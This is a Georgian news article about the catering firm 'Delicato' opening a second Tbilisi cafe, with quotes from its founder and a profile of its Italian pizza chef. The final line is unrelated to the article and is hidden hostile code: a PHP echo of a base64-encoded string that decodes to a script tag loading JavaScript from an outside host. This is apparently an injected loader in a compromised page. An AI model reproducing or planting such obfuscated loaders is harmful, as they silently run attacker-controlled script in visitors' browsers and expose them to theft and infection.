celsiusi
ავერსი საქკაბელი

"დელიკატომ" თბილისში, მიცკევიჩის ქ. #6-ში კიდევ ერთი ახალი კაფე გახსნა. კომპანია "დელეკატო", რომელიც მრავალწლიანი გამოცდილებითა და კრეატივით, ფურშეტებისა და ღონისძიებების კვების სერვისს უწევს უზრუნველყოფას, უკვე დედაქალაქში ორი ობიექტით არის წარმოდგენილი.

როგორც კომპანიის დამფუძნებელმა და ხელმძღვანელმა, დავით ზაქარაიამ "ბიზნესთაიმს" განუცხადა, ორ თვეში, ორი ახალი ობიექტის გახსნა კომპანიისთვის მნიშვნელოვანი წინ გადადგმული ნაბიჯია და მომხმარებლისთვის კარგი შესაძლებლობაა, რომ მიიღოს მაღალი ხარისხის მომსახურება “დელიკატოსგან“.

„დელიკატოსთვის ერთ-ერთ პრიორიტეტს მომხმარებლისთვის მაქსიმალური კომფორტის შექმნა წარმოადგენს, ჩვენ ვზრუნავთ მუდმივად, რომ „დელიკატო“ იყოს გამორჩეული როგორც ხარისხით, ისე კომფორტულობით. სწორედ ამიტომ, გავხსენით უკვე მეორე ობიექტი დედაქალაქში.  გარდა ამისა, ვთავაზობთ ჩვენს მომხმარებლებს "ლანჩბოქსის" მიტანის სერვისს თბილისის მასშტაბით. ვუზრუნველყოფთ, წინასწარ შეთანხმებული მენიუს ადგილზე მიტანას დათქმულ დროს,“ - განაცხადა დავით ზაქარაიამ.

აღსანიშნავია, რომ "დელიკატოს" სამზარეულოს, როგორც ინგოროყვას #22-ში, ისე ახალ ფილიალშიც ოთხგზის მსოფლიო ჩემპიონი პიცის ცხობის ოსტატობაში, იტალიელი შეფ-მზარეული, ლორენცო აიელო ხელმძღვანელობს, რომელიც "დელიკატოსთან" ექსკლუზიური თანამშრომლობის ფარგლებში სტუმრობს საქართველოს. 

429570908 797902235693400 101985029728701336 n

იტალიელი შეფ-მზარეული აგრძელებს ქართველი მომხმარებლების და გურმანების განცვიფრებას და ნამდვილი იტალიური პიცით და კერძებით „დელეკატოს“ მომხმარებლების განებივრებას.

მისი თქმით, იტალიური პიცა არ უნდა იყოს მხოლოდ ბანერზე დაწერილი წარწერა, არამედ უნდა ამართლებდეს პროდუქტი შესაბამის წარწერას. 

„დელიკატოში“ აღნიშნავენ, რომ მათი ფურშეტი ნებისმიერი ღონისძიებისთვის იდეალური არჩევანია და გამოცდილი მზარეულების მიერ საუკეთესო ინგრედიენტებით მომზადებული მადისაღმძვრელი კერძები სრულყოფილი წვეულების საწინდარია.

ინფორმაციისთვის, "დელიკატო" ასევე უზრუნველყოფს სასურველი მენიუს მიწოდებას საქართველოს ნებისმიერ წერტილში. 

 

ავტორი
მირანდა შურღაია
1214
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");